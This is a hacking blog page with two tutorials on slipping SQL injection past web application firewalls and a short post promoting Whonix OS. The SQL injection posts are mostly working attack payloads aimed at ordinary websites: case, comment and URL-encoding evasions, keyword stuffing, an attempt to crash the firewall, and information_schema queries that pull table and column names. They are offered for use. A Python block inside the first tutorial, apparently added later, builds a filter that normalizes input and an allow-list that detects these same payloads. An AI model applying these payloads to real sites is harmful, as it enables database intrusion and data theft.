Thursday, June 13, 2013

[TUT] WAF Bypass Sql Injection

Today I am going to show you how to bypass Web Application Firewalls (WAF). I will demonstrate everything from the simplest and most basic techniques to the most advanced ones!

NOTE: If you don’t know SQL Injection, read this first…


What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and block SQL Injections!

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injection (usually the “UNION SELECT” command), you get a 403 error (and the website says “Forbidden” or “Not Acceptable”).
Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)
Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:
You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)

However, most WAFs identify this method, so they still show a “Forbidden” error…

2) Change the Case of the Letters:
You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAFs!

3) Combine the previous Methods:
What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:
Some firewalls remove the “UNION SELECT” statement when it is found in the URL… We can do this to exploit that behaviour:

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” )

This method doesn’t work on ALL firewalls, as only some of them remove the “UNION” and the “SELECT” keywords when they are detected!

5) Inline Comments:
Some firewalls can be bypassed by inserting inline comments between the “UNION” and the “SELECT” keywords:

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(%55 is the URL encoding of “U” and %53 of “S”. See more in the Advanced section…)

I believe these are the most basic methods of WAF bypassing! Let’s move on to more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many firewalls are developed in C/C++ and we can crash them using a buffer overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

(( You can test if the WAF can be crashed by typing:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500 error, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:
We can replace some characters with their HEX (URL-encoded) values.
Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from “UNION SELECT”, other commands might be blocked.
Common Commands Blocked:
COMMAND        | WHAT TO USE INSTEAD
@@version      | version()
concat()       | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()

Learning MySQL really helps with such issues!

4) Misc Exploitable Functions:
Many firewalls try to offer more protection by adding prototype or strange functions! (Which, of course, we can exploit!):
Example:

The firewall below replaces “*” (asterisks) with whitespace! What we can do is this:

http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…

(If the firewall removes the “*”, the result will be: 15+union+select….)
So, if you find such a silly function, you can exploit it in this way!

[+] In addition to the previous example, some other bypasses might be:

-15+(uNioN)+(sElECt)….

-15+(uNioN+SeleCT)+…

-15+(UnI)(oN)+(SeL)(ecT)+….

-15+union (select 1,2,3,4…)
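A defender-side check of the evasions listed above (an added example, not code from the tutorial): a naive case-sensitive blocklist, the single-pass keyword deletion that method 4 abuses, and a normalizing detector that URL-decodes, strips comments and case-folds before matching. The payload strings are constructed from this page's examples, the asterisk-deleting step is assumed to mirror the filter described in advanced method 4, and page_id is assumed to be an integer parameter.

```python
import re
from urllib.parse import unquote

# Constructed inputs: the page_id values from the tutorial's examples, as received by the server.
PAYLOADS = [
    "-15 UNION SELECT 1,2,3,4",                  # plain
    "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",        # method 1: version comments
    "-15 uNIoN sELecT 1,2,3,4",                  # method 2: case change
    "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",        # method 3: both
    "-15 %55nION/**/%53ElecT 1,2,3,4",           # method 5: URL encoding + inline comment
    "-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4",    # advanced 2: hex-encoded letters
    "-15+uni*on+sel*ect+1,2,3,4",                # advanced 4: asterisks the filter deletes
]
STUFFED = "-15 UNIunionON SELselectECT 1,2,3,4"  # method 4: keyword stuffing

def naive_blocklist(value):
    """Case-sensitive substring match: the filter the tutorial's basic methods slip past."""
    return "UNION SELECT" in value

def strip_keywords_once(value):
    """Single-pass keyword deletion. Deleting text is not a defence: on STUFFED it
    manufactures the very token it tried to remove."""
    return value.replace("union", "").replace("select", "")

def normalize(value):
    """Canonicalise before matching; each step undoes one evasion from the tutorial."""
    s = value.replace("+", " ")
    for _ in range(3):                      # decode until stable, so %2555 -> %55 -> U
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # MySQL runs /*!...*/ bodies: keep them
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # ordinary comments act as whitespace
    s = s.replace("*", "")  # assumption: mirrors the asterisk-deleting filter of advanced method 4
    s = re.sub(r"[\s\x00-\x1f]+", " ", s)                    # %0A, %0D, tabs are whitespace to SQL
    return s.lower().strip()

UNION_SELECT = re.compile(r"\bunion\b(\s+(all|distinct|distinctrow))?\s+select\b")

def looks_like_union_select(value):
    """Detect on the normalized form, never on the raw request string."""
    return bool(UNION_SELECT.search(normalize(value)))

def accept_page_id(value):
    """The check that evasion cannot reach: page_id is an integer, so allow only integers
    and bind the value as a query parameter; blocklists are a second layer, not the fix."""
    return re.fullmatch(r"-?\d+", value.strip()) is not None
```

The stuffed payload only turns into “UNION SELECT” after the deletion filter has run, so any match must be applied to the value the database will actually receive; the integer allow-list rejects every payload here regardless of encoding.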
Video Tutorial on WAF Bypassing:

(This tutorial was originally created by Akatzbreaker for Hackforums.net. The original post is here…)

Wednesday, May 22, 2013

Whonix OS - A complete anonymous TOR OS


About Whonix OS:

Whonix is a general-purpose operating system built on VirtualBox, Debian GNU/Linux and Tor. Whonix is designed so that IP and DNS leaks are not possible; even malware with administrative rights cannot find out the user's real IP address and location.

(Image: GUI Desktop Whonix OS)

This works by running two virtual machines: one runs Tor and acts as a gateway, and the other is the isolated Whonix workstation, for complete isolation.

Whonix is designed by the Tor anonymity team; as it is in a beta version, some bugs and virtualization issues may be found.


Screenshots of Whonix OS:

(Image: Tor browser configured for anonymous browsing)

(Image: Flash leak test conducted for complete anonymity verification)

Some of the best features of Whonix OS are that it can run Flash and Java applets anonymously, and it hides from trackers the fact that you are using Tor. You can download this anonymous Tor-powered Whonix OS from here…

WHONIX OS <<DOWNLOAD LINK>>

If you are a first-time user, the default username and password are: | USERNAME: user  PASSWORD: changeme |


source :  http://hackersmeet.blogspot.in

Thursday, May 16, 2013

WAF Bypass Sql Injection Tips

This is for those who already know SQL injection. Sometimes there will be a 403 Forbidden error or a Not Acceptable error; this is because of the WAF (web application firewall). You can bypass this by using the following queries. If you don't know SQL injection you can learn it HERE

Order By Not Working?
You can simply bypass it by using group by instead of order by

Union Select Bypassing::

union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))

/*!50000union*/+/*!50000select*/ 

UNIunionON+SELselectECT 

+union+distinct+select+ 

+union+distinctROW+select+ 

union+/*!select*/+1,2,3 

union/**/select/**/1,2,3 

uni%20union%20/*!select*/%20 

/**//*!union*//**//*!select*//**/ 

union%23aa%0Aselect 

/**/union/*!50000select*/ 

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ 

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 

+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+

id=1+'UnI"On'+'SeL"ECT' <-MySQL only

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

After the id number (e.g. id=1) add one of these::

+div+0 

Having+1=0 

+AND+1=0 

+/*!and*/+1=0 

and(1)=(0)
False The Url::

=-id=-1 union all select 

id=null union all select 

id=1+and+false+union+all+select 

id=9999 union all select
Order Bypassing, do it like this::

/*!table_name*/ 

+from /*!information_schema*/./*!tables*/ where table_schema=database() 

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
used with order::

convert(… using ascii)

unhex(hex())
If ascii doesn't work you could try one of these character sets instead:

ujis, ucs2, tis620, swe7, sjis, macroman, macce, latin7, latin5, latin2, koi8u, koi8r, keybcs2, hp8, geostd8, gbk, gb2312, armscii8, ascii, binary, cp1250, big5, cp1251, cp1256, cp1257, cp850, cp852, cp866, cp932, dec8, euckr, latin1, utf8
source :  http://hack2play.blogspot.com